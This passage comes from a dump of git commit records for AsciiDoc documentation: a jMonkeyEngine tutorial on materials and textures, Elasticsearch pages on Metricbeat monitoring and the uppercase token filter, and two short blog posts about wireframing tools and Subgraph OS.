sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White);\n sphereMat.setColor(\"Specular\",ColorRGBA.White);\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [0,128]\n sphereGeo.setMaterial(sphereMat);\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n\n \/** Must add a light to make the lit object visible! *\/\n DirectionalLight sun = new DirectionalLight();\n sun.setDirection(new Vector3f(1,0,-2).normalizeLocal());\n sun.setColor(ColorRGBA.White);\n rootNode.addLight(sun);\n\n }\n}\n\n----\n\nYou should see\n\n* Left \u2013 A cube with a brown monkey texture.\n* Right \u2013 A translucent monkey picture in front of a shiny bumpy rock.\n\nMove around with the WASD keys to have a closer look at the translucency, and the rock's bumpiness.\n\n\n== Simple Unshaded Texture\n\nTypically you want to give objects in your scene textures: It can be rock, grass, brick, wood, water, metal, paper\u2026 A texture is a normal image file in JPG or PNG format. In this example, you create a box with a simple unshaded Monkey texture as material.\n\n[source,java]\n----\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n----\n\nHere is what we did: to create a textured box:\n\n. Create a Geometry `cube1Geo` from a Box mesh `cube1Mesh`.\n. Create a Material `cube1Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube1Tex` from the `Monkey.jpg` file in the `assets\/Interface\/Logo\/` directory of the project.\n. Load the texture `cube1Tex` into the `ColorMap` layer of the material `cube1Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n== Transparent Unshaded Texture\n\n`Monkey.png` is the same texture as `Monkey.jpg`, but with an added alpha channel. The alpha channel allows you to specify which areas of the texture you want to be opaque or transparent: Black areas of the alpha channel remain opaque, gray areas become translucent, and white areas become transparent.\n\nFor a partially translucent\/transparent texture, you need:\n\n* A Texture with alpha channel\n* A Texture with blend mode of `BlendMode.Alpha`\n* A Geometry in the `Bucket.Transparent` render bucket. +\nThis bucket ensures that the transparent object is drawn on top of objects behind it, and they show up correctly under the transparent parts.\n\n[source,java]\n----\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha); \/\/ !\n cube2Geo.setQueueBucket(Bucket.Transparent); \/\/ !\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n----\n\nFor non-transparent objects, the drawing order is not so important, because the z-buffer already keeps track of whether a pixel is behind something else or not, and the color of an opaque pixel doesn't depend on the pixels under it, this is why opaque Geometries can be drawn in any order.\n\nWhat you did for the transparent texture is the same as before, with only one added step for the transparency.\n\n. Create a Geometry `cube2Geo` from a Box mesh `cube2Mesh`. This Box Geometry is flat upright box (because z=0.01f).\n. Create a Material `cube2Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube2Tex` from the `Monkey.png` file in the `assets\/Textures\/ColoredTex\/` directory of the project. This PNG file must have an alpha layer.\n. *Activate transparency in the material by setting the blend mode to Alpha.*\n. *Set the QueueBucket of the Geometry to `Bucket.Transparent`.*\n. Load the texture `cube2Tex` into the `ColorMap` layer of the material `cube2Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n\n[TIP]\n====\nLearn more about creating PNG images with an alpha layer in the help system of your graphic editor.\n====\n\n\n\n== Shininess and Bumpiness\n\nBut textures are not all. Have a close look at the shiny sphere \u2013 you cannot get such a nice bumpy material with just a plain texture. You see that JME3 also supports so-called Phong-illuminated materials:\n\nIn a lit material, the standard texture layer is refered to as _DiffuseMap_, any material can use this layer. A lit material can additionally have lighting effects such as _Shininess_ used together with the _SpecularMap_ layer and _Specular_ color. And you can even get a realistically bumpy or cracked surface with help of the _NormalMap_ layer.\n\nLet's have a look at the part of the code example where you create the shiny bumpy rock.\n\n. Create a Geometry from a Sphere shape. Note that this shape is a normal smooth sphere mesh.\n+\n[source,java]\n----\n\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n----\n\n.. (Only for Spheres) Change the sphere's TextureMode to make the square texture project better onto the sphere.\n+\n[source,java]\n----\n\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected);\n----\n\n.. You must generate TangentBinormals for the mesh so you can use the NormalMap layer of the texture.\n+\n[source,java]\n----\n\n TangentBinormalGenerator.generate(sphereMesh);\n----\n\n\n. Create a material based on the `Lighting.j3md` default material.\n+\n[source,java]\n----\n\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n----\n\n.. Set a standard rocky texture in the `DiffuseMap` layer.\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond.jpg[Pond.jpg,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n\n----\n\n.. Set the `NormalMap` layer that contains the bumpiness. The NormalMap was generated for this particular DiffuseMap with a special tool (e.g. Blender).\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond_normal.png[Pond_normal.png,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n----\n\n.. Set the Material's Shininess to a value between 1 and 128. For a rock, a low fuzzy shininess is appropriate. Use material colors to define the shiny Specular color.\n+\n[source,java]\n----\n\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White); \/\/ minimum material color\n sphereMat.setColor(\"Specular\",ColorRGBA.White); \/\/ for shininess\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [1,128] for shininess\n----\n\n\n. Assign your newly created material to the Geometry.\n+\n[source,java]\n----\n\n sphereGeo.setMaterial(sphereMat);\n----\n\n. Let's move and rotate the geometry a bit to position it better.\n+\n[source,java]\n----\n\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n----\n\n\nRemember that any Lighting.j3md-based material requires a light source, as shown in the full code sample above.\n\n\n\n[TIP]\n====\nTo deactivate Shininess, do not set `Shininess` to 0, but instead set the `Specular` color to `ColorRGBA.Black`.\n====\n\n\n\n== Default Material Definitions\n\nAs you have seen, you can find the following default materials in `jme\/core-data\/Common\/MatDefs\/\u2026`.\n[cols=\"20,40,40\", options=\"header\"]\n|===\n\na| Default Definition\na| Usage\n<a| Parameters\n\na| `Misc\/Unshaded.j3md`\na| Colored: Use with mat.setColor() and ColorRGBA. +\nTextured: Use with mat.setTexture() and Texture.\na| Color : Color +\nColorMap : Texture2D\n\n<a| `Light\/Lighting.j3md`\na| Use with shiny Textures, Bump- and NormalMaps textures. +\nRequires a light source.\na| Ambient, Diffuse, Specular : Color +\nDiffuseMap, NormalMap, SpecularMap : Texture2D +\nShininess : Float\n\n|===\n\nFor a game, you create custom Materials based on these existing MaterialDefintions \u2013 as you have just seen in the example with the shiny rock's material.\n\n\n== Exercises\n\n\n=== Exercise 1: Custom .j3m Material\n\nLook at the shiny rocky sphere above again. It takes several lines to create and set the Material.\n\n* Note how it loads the `Lighting.j3md` Material definition.\n* Note how it sets the `DiffuseMap` and `NormalMap` to a texture path.\n* Note how it activates `UseMaterialColors` and sets `Specular` and `Diffuse` to 4 float values (RGBA color).\n* Note how it sets `Shininess` to 64.\n\nIf you want to use one custom material for several models, you can store it in a .j3m file, and save a few lines of code every time.\n\nYou create a j3m file as follows:\n\n. Create a plain text file `assets\/Materials\/MyCustomMaterial.j3m` in your project directory, with the following content:\n+\n[source]\n----\nMaterial My shiny custom material : Common\/MatDefs\/Light\/Lighting.j3md {\n MaterialParameters {\n DiffuseMap : Textures\/Terrain\/Pond\/Pond.jpg\n NormalMap : Textures\/Terrain\/Pond\/Pond_normal.png\n UseMaterialColors : true\n Specular : 1.0 1.0 1.0 1.0\n Diffuse : 1.0 1.0 1.0 1.0\n Shininess : 64.0\n }\n}\n\n----\n\n** Note that `Material` is a fixed keyword.\n** Note that `My shiny custom material` is a String that you can choose to describe the material.\n** Note how the code sets all the same properties as before!\n\n. In the code sample, comment out the eight lines that have `sphereMat` in them.\n. Below this line, add the following line:\n+\n[source,java]\n----\nsphereGeo.setMaterial((Material) assetManager.loadMaterial(\n \"Materials\/MyCustomMaterial.j3m\"));\n\n----\n\n. Run the app. The result is the same.\n\nUsing this new custom material `MyCustomMaterial.j3m` only takes one line. You have replaced the eight lines of an on-the-fly material definition with one line that loads a custom material from a file. Using .j3m files is very handy if you use the same material often.\n\n\n=== Exercise 2: Bumpiness and Shininess\n\nGo back to the bumpy rock sample above:\n\n. Comment out the DiffuseMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Comment out the NormalMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Change the value of Shininess to values like 0, 63, 127.\n** What aspect of the Shininess changes?\n\n\n\n== Conclusion\n\nYou have learned how to create a Material, specify its properties, and use it on a Geometry. You know how to load an image file (.png, .jpg) as texture into a material. You know to save texture files in a subfolder of your project's `assets\/Textures\/` directory.\n\nYou have also learned that a material can be stored in a .j3m file. The file references a built-in MaterialDefinition and specifies values for properties of that MaterialDefinition. You know to save your custom .j3m files in your project's `assets\/Materials\/` directory.\n\n*See also:*\n\n* xref:ROOT:jme3\/intermediate\/how_to_use_materials.adoc[How to Use Materials]\n* xref:ROOT:sdk\/material_editing.adoc[Material Editing]\n* link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine3-material-system-full-explanation\/12947[Materials] forum thread\n\/\/* link:http:\/\/nbviewer.jupyter.org\/github\/jMonkeyEngine\/wiki\/blob\/master\/src\/docs\/resources\/tutorials\/material\/jME3_materials.pdf[jME3 Materials documentation (PDF)]\n* link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Video Tutorial: Editing and Assigning Materials to Models in jMonkeyEngine SDK (from 2010, is there a newer one?]\n* link:https:\/\/www.blender.org\/support\/tutorials\/[Creating textures in Blender]\n* link:http:\/\/www.shaders.co.uk\/ifw2_textures\/whatsin10.htm[Various Material screenshots] (Not done with JME3, this is just to show the fantastic range of Material parameters in the hands of an expert, until we have a JME3 demo for it.)\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"f6822823662482d1806ee2518e380979a85a4482","subject":"[DOCS] Disable Metricbeat system module (#42601)","message":"[DOCS] Disable Metricbeat system module (#42601)\n\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/monitoring\/configuring-metricbeat.asciidoc","new_file":"docs\/reference\/monitoring\/configuring-metricbeat.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"gold\"]\n[[configuring-metricbeat]]\n=== Collecting {es} monitoring data with {metricbeat}\n\n[subs=\"attributes\"]\n++++\n<titleabbrev>Collecting monitoring data with {metricbeat}<\/titleabbrev>\n++++\n\nIn 6.5 and later, you can use {metricbeat} to collect data about {es} \nand ship it to the monitoring cluster, rather than routing it through exporters \nas described in <<collecting-monitoring-data>>. \n\nimage::monitoring\/images\/metricbeat.png[Example monitoring architecture]\n\nTo learn about monitoring in general, see \n{stack-ov}\/xpack-monitoring.html[Monitoring the {stack}]. \n\n\/\/NOTE: The tagged regions are re-used in the Stack Overview.\n\n. Enable the collection of monitoring data.\n+\n--\n\/\/ tag::enable-collection[]\nSet `xpack.monitoring.collection.enabled` to `true` on each node in the\nproduction cluster. By default, it is is disabled (`false`). \n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following APIs to review and change this setting:\n\n[source,js]\n----------------------------------\nGET _cluster\/settings\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.collection.enabled\": true\n }\n}\n----------------------------------\n\/\/ CONSOLE \n\/\/ end::enable-collection[]\nFor more information, see <<monitoring-settings>> and <<cluster-update-settings>>.\n--\n\n. Disable the default collection of {es} monitoring metrics.\n+\n--\n\/\/ tag::disable-default-collection[]\nSet `xpack.monitoring.elasticsearch.collection.enabled` to `false` on each node\nin the production cluster.\n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following API to change this setting:\n\n[source,js]\n----------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.elasticsearch.collection.enabled\": false\n }\n}\n----------------------------------\n\/\/ CONSOLE\n\nLeave `xpack.monitoring.enabled` set to its default value (`true`). \n\/\/ end::disable-default-collection[]\n--\n\n. {metricbeat-ref}\/metricbeat-installation.html[Install {metricbeat}] on each\n{es} node in the production cluster.\n\n. Enable the {es} module in {metricbeat} on each {es} node. +\n+\n--\n\/\/ tag::enable-es-module[]\nFor example, to enable the default configuration in the `modules.d` directory, \nrun the following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules enable elasticsearch\n----------------------------------------------------------------------\n\nFor more information, see \n{metricbeat-ref}\/configuration-metricbeat.html[Specify which modules to run] and \n{metricbeat-ref}\/metricbeat-module-elasticsearch.html[{es} module]. \n\n\/\/ end::enable-es-module[]\n--\n\n. Configure the {es} module in {metricbeat}. +\n+\n--\nFor example, specify the following settings in the `modules.d\/elasticsearch.yml`\nfile:\n\n[source,yaml]\n----------------------------------\n- module: elasticsearch\n metricsets:\n - ccr\n - cluster_stats\n - index\n - index_recovery\n - index_summary\n - ml_job\n - node_stats\n - shard\n period: 10s\n hosts: [\"http:\/\/localhost:9200\"] \n #username: \"user\"\n #password: \"secret\"\n xpack.enabled: true \n----------------------------------\n\nBy default, the module collects {es} monitoring metrics from\n`http:\/\/localhost:9200`. If that host and port number are not correct, you must\nupdate the `hosts` setting. If you configured {es} to use encrypted\ncommunications, you must access it via HTTPS. For example, use a `hosts` setting like `https:\/\/localhost:9200`.\n\/\/ end::configure-es-module[]\n\n\/\/ tag::remote-monitoring-user[]\nIf Elastic {security-features} are enabled, you must also provide a user ID \nand password so that {metricbeat} can collect metrics successfully: \n\n.. Create a user on the production cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_collector` built-in role]. \nAlternatively, use the {stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} module configuration \nfile.\n\/\/ end::remote-monitoring-user[]\n--\n\n. Optional: Disable the system module in {metricbeat}.\n+\n--\n\/\/ tag::disable-system-module[]\nBy default, the {metricbeat-ref}\/metricbeat-module-system.html[system module] is\nenabled. The information it collects, however, is not shown on the *Monitoring*\npage in {kib}. Unless you want to use that information for other purposes, run\nthe following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules disable system\n----------------------------------------------------------------------\n\n\/\/ end::disable-system-module[] \n--\n\n. Identify where to send the monitoring data. +\n+\n--\nTIP: In production environments, we strongly recommend using a separate cluster \n(referred to as the _monitoring cluster_) to store the data. Using a separate \nmonitoring cluster prevents production cluster outages from impacting your \nability to access your monitoring data. It also prevents monitoring activities \nfrom impacting the performance of your production cluster.\n\nFor example, specify the {es} output information in the {metricbeat} \nconfiguration file (`metricbeat.yml`):\n\n[source,yaml]\n----------------------------------\noutput.elasticsearch:\n # Array of hosts to connect to.\n hosts: [\"http:\/\/es-mon-1:9200\", \"http:\/\/es-mon2:9200\"] <1>\n \n # Optional protocol and basic auth credentials.\n #protocol: \"https\"\n #username: \"elastic\"\n #password: \"changeme\" \n----------------------------------\n<1> In this example, the data is stored on a monitoring cluster with nodes \n`es-mon-1` and `es-mon-2`.\n\nIf you configured the monitoring cluster to use encrypted communications, you\nmust access it via HTTPS. For example, use a `hosts` setting like\n`https:\/\/es-mon-1:9200`.\n\nIMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the\ncluster that stores the monitoring data must have at least one \n<<ingest,ingest node>>. \n\nIf {es} {security-features} are enabled on the monitoring cluster, you \nmust provide a valid user ID and password so that {metricbeat} can send metrics \nsuccessfully. \n\n.. Create a user on the monitoring cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_agent` built-in role]. \nAlternatively, use the \n{stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} output information in \nthe {metricbeat} configuration file.\n\nFor more information about these configuration options, see \n{metricbeat-ref}\/elasticsearch-output.html[Configure the {es} output].\n--\n\n. <<starting-elasticsearch,Start {es}>> on each node.\n\n. {metricbeat-ref}\/metricbeat-starting.html[Start {metricbeat}] on each node. \n\n. {kibana-ref}\/monitoring-data.html[View the monitoring data in {kib}]. \n","old_contents":"[role=\"xpack\"]\n[testenv=\"gold\"]\n[[configuring-metricbeat]]\n=== Collecting {es} monitoring data with {metricbeat}\n\n[subs=\"attributes\"]\n++++\n<titleabbrev>Collecting monitoring data with {metricbeat}<\/titleabbrev>\n++++\n\nIn 6.5 and later, you can use {metricbeat} to collect data about {es} \nand ship it to the monitoring cluster, rather than routing it through exporters \nas described in <<collecting-monitoring-data>>. \n\nimage::monitoring\/images\/metricbeat.png[Example monitoring architecture]\n\nTo learn about monitoring in general, see \n{stack-ov}\/xpack-monitoring.html[Monitoring the {stack}]. \n\n\/\/NOTE: The tagged regions are re-used in the Stack Overview.\n\n. Enable the collection of monitoring data.\n+\n--\n\/\/ tag::enable-collection[]\nSet `xpack.monitoring.collection.enabled` to `true` on each node in the\nproduction cluster. By default, it is is disabled (`false`). \n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following APIs to review and change this setting:\n\n[source,js]\n----------------------------------\nGET _cluster\/settings\n\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.collection.enabled\": true\n }\n}\n----------------------------------\n\/\/ CONSOLE \n\/\/ end::enable-collection[]\nFor more information, see <<monitoring-settings>> and <<cluster-update-settings>>.\n--\n\n. Disable the default collection of {es} monitoring metrics.\n+\n--\n\/\/ tag::disable-default-collection[]\nSet `xpack.monitoring.elasticsearch.collection.enabled` to `false` on each node\nin the production cluster.\n\nNOTE: You can specify this setting in either the `elasticsearch.yml` on each \nnode or across the cluster as a dynamic cluster setting. If {es} \n{security-features} are enabled, you must have `monitor` cluster privileges to \nview the cluster settings and `manage` cluster privileges to change them.\n\nFor example, you can use the following API to change this setting:\n\n[source,js]\n----------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"xpack.monitoring.elasticsearch.collection.enabled\": false\n }\n}\n----------------------------------\n\/\/ CONSOLE\n\nLeave `xpack.monitoring.enabled` set to its default value (`true`). \n\/\/ end::disable-default-collection[]\n--\n\n. {metricbeat-ref}\/metricbeat-installation.html[Install {metricbeat}] on each\n{es} node in the production cluster.\n\n. Enable the {es} module in {metricbeat} on each {es} node. +\n+\n--\n\/\/ tag::enable-es-module[]\nFor example, to enable the default configuration in the `modules.d` directory, \nrun the following command:\n\n[\"source\",\"sh\",subs=\"attributes,callouts\"]\n----------------------------------------------------------------------\nmetricbeat modules enable elasticsearch\n----------------------------------------------------------------------\n\nFor more information, see \n{metricbeat-ref}\/configuration-metricbeat.html[Specify which modules to run] and \n{metricbeat-ref}\/metricbeat-module-elasticsearch.html[{es} module]. \n\n\/\/ end::enable-es-module[]\n--\n\n. Configure the {es} module in {metricbeat}. +\n+\n--\nFor example, specify the following settings in the `modules.d\/elasticsearch.yml`\nfile:\n\n[source,yaml]\n----------------------------------\n- module: elasticsearch\n metricsets:\n - ccr\n - cluster_stats\n - index\n - index_recovery\n - index_summary\n - ml_job\n - node_stats\n - shard\n period: 10s\n hosts: [\"http:\/\/localhost:9200\"] \n #username: \"user\"\n #password: \"secret\"\n xpack.enabled: true \n----------------------------------\n\nBy default, the module collects {es} monitoring metrics from\n`http:\/\/localhost:9200`. If that host and port number are not correct, you must\nupdate the `hosts` setting. If you configured {es} to use encrypted\ncommunications, you must access it via HTTPS. For example, use a `hosts` setting like `https:\/\/localhost:9200`.\n\/\/ end::configure-es-module[]\n\n\/\/ tag::remote-monitoring-user[]\nIf Elastic {security-features} are enabled, you must also provide a user ID \nand password so that {metricbeat} can collect metrics successfully: \n\n.. Create a user on the production cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_collector` built-in role]. \nAlternatively, use the {stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} module configuration \nfile.\n\/\/ end::remote-monitoring-user[]\n--\n\n. Identify where to send the monitoring data. +\n+\n--\nTIP: In production environments, we strongly recommend using a separate cluster \n(referred to as the _monitoring cluster_) to store the data. Using a separate \nmonitoring cluster prevents production cluster outages from impacting your \nability to access your monitoring data. It also prevents monitoring activities \nfrom impacting the performance of your production cluster.\n\nFor example, specify the {es} output information in the {metricbeat} \nconfiguration file (`metricbeat.yml`):\n\n[source,yaml]\n----------------------------------\noutput.elasticsearch:\n # Array of hosts to connect to.\n hosts: [\"http:\/\/es-mon-1:9200\", \"http:\/\/es-mon2:9200\"] <1>\n \n # Optional protocol and basic auth credentials.\n #protocol: \"https\"\n #username: \"elastic\"\n #password: \"changeme\" \n----------------------------------\n<1> In this example, the data is stored on a monitoring cluster with nodes \n`es-mon-1` and `es-mon-2`.\n\nIf you configured the monitoring cluster to use encrypted communications, you\nmust access it via HTTPS. For example, use a `hosts` setting like\n`https:\/\/es-mon-1:9200`.\n\nIMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the\ncluster that stores the monitoring data must have at least one \n<<ingest,ingest node>>. \n\nIf {es} {security-features} are enabled on the monitoring cluster, you \nmust provide a valid user ID and password so that {metricbeat} can send metrics \nsuccessfully. \n\n.. Create a user on the monitoring cluster that has the \n{stack-ov}\/built-in-roles.html[`remote_monitoring_agent` built-in role]. \nAlternatively, use the \n{stack-ov}\/built-in-users.html[`remote_monitoring_user` built-in user].\n\n.. Add the `username` and `password` settings to the {es} output information in \nthe {metricbeat} configuration file.\n\nFor more information about these configuration options, see \n{metricbeat-ref}\/elasticsearch-output.html[Configure the {es} output].\n--\n\n. <<starting-elasticsearch,Start {es}>> on each node.\n\n. {metricbeat-ref}\/metricbeat-starting.html[Start {metricbeat}] on each node. \n\n. {kibana-ref}\/monitoring-data.html[View the monitoring data in {kib}]. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4c80a2c8683ef18441c1d158446e2b106b44723","subject":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","message":"Update 2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-web-tool-for-mobile-App.adoc","new_contents":"= Seeking the best wireframing web tool for mobile App\n\nMaking prototyping or wireframing your idea is significantly important process for designing mobile app.\n\n== Prott\nhttps:\/\/prottapp.com\n\n== atomic\nhttps:\/\/atomic.io\/\n\n== MockingBot\nhttps:\/\/mockingbot.com\/\n\n","old_contents":"= Seeking the best wireframing web tool for mobile App\n\nMaking prototyping or wire framing your idea is significantly important process for designing mobile app.\n\n== Prott\nhttps:\/\/prottapp.com\n\n== atomic\nhttps:\/\/atomic.io\/\n\n== MockingBot\nhttps:\/\/mockingbot.com\/\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0571620ca3200d32c4d38aecd43ec2df48833f3e","subject":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","message":"Update 2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_file":"_posts\/2016-03-22-Subgraph-a-featherweight-O-S-for-non-technical-users.adoc","new_contents":":hp-tags: Subgraph, linux, OS, operating system, news\n\n= Subgraph - a featherweight OS for non-technical users\n\nThe Debian-based Subgraph OS, first released in 2015, is a featherweight open-source solution that comes with all the security and privacy options pre-configured so that non-technical users abandon Windows without the hassle that \n\n[horizontal]\n.Key features\nFull Disk Encryption:: On by default\nTor:: All traffic goes through it\nApplication sandboxing:: Using Containe\nSystem and Kernel Security:: Grssecurity+++\nSecure Mail Services:: With simple PGP key management\n\n","old_contents":":hp-tags: Subgraph, linux, OS, operating system, news\n\n= Subgraph - a featherweight OS for non-technical users\n\nThe Debian-based Subgraph OS, first released in 2015, is a featherweight open-source solution that comes with all the security and privacy options pre-configured so that non-technical users abandon Windows without the hassle that \n\n[horizontal]\n.Key features\nFull Disk Encryption:: On by default\nTor:: All traffic goes through it\nApplication sandboxing:: using Containe\nSystem and Kernel Security:: Grssecurity+++\nSecure Mail Services:: with simple PGP key management\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"90e139e2526e14dd43b3b998a596e66b23458df0","subject":"[DOCS] Reformat uppercase token filter docs (#50555)","message":"[DOCS] Reformat uppercase token filter docs (#50555)\n\n* Updates the description and adds a Lucene link\r\n* Adds analyze and custom analyzer snippets\r\n","repos":"HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/uppercase-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/uppercase-tokenfilter.asciidoc","new_contents":"[[analysis-uppercase-tokenfilter]]\n=== Uppercase token filter\n++++\n<titleabbrev>Uppercase<\/titleabbrev>\n++++\n\nChanges token text to uppercase. For example, you can use the `uppercase` filter\nto change `the Lazy DoG` to `THE LAZY DOG`.\n\nThis filter uses Lucene's\nhttps:\/\/lucene.apache.org\/core\/{lucene_version_path}\/analyzers-common\/org\/apache\/lucene\/analysis\/core\/UpperCaseFilter.html[UpperCaseFilter].\n\n[WARNING]\n====\nDepending on the language, an uppercase character can map to multiple\nlowercase characters. Using the `uppercase` filter could result in the loss of\nlowercase character information.\n\nTo avoid this loss but still have a consistent lettercase, use the <<analysis-lowercase-tokenfilter,`lowercase`>> filter instead.\n====\n\n[[analysis-uppercase-tokenfilter-analyze-ex]]\n==== Example\n\nThe following <<indices-analyze,analyze API>> request uses the default\n`uppercase` filter to change the `the Quick FoX JUMPs` to uppercase:\n\n[source,console]\n--------------------------------------------------\nGET _analyze\n{\n \"tokenizer\" : \"standard\",\n \"filter\" : [\"uppercase\"],\n \"text\" : \"the Quick FoX JUMPs\"\n}\n--------------------------------------------------\n\nThe filter produces the following tokens:\n\n[source,text]\n--------------------------------------------------\n[ THE, QUICK, FOX, JUMPS 